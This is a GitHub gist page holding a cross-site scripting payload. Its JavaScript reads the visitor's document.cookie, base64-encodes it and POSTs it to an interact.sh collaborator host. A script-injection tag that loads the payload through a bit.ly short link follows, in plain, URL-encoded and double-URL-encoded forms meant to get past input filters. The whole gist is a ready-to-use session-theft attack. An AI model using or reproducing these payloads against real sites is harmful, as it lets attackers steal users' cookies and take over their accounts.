Created
March 26, 2022 16:34
-
-
Save sudoaza/afa7cdc79bd5d50e203d4f8386e353be to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// <script> | |
let collab = "c8xq3e52vtc0000hxsx0grq5tzyyyyyyb.interact.sh"; | |
let xhr = new XMLHttpRequest(); | |
xhr.open("POST", "http://" + collab); | |
xhr.send(btoa(document.cookie)); | |
// </script> |
HTML:
<script src=//bit.ly/3tHp1oN />
URL Encoded:
%3Cscript%20src%3D%2F%2Fbit%2Ely%2F3tHp1oN%20%2F%3E
Double URL Encoded:
%253Cscript%2520src%253D%252F%252Fbit%252Ely%252F3tHp1oN%2520%252F%253E
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
https://bit.ly/3tHp1oN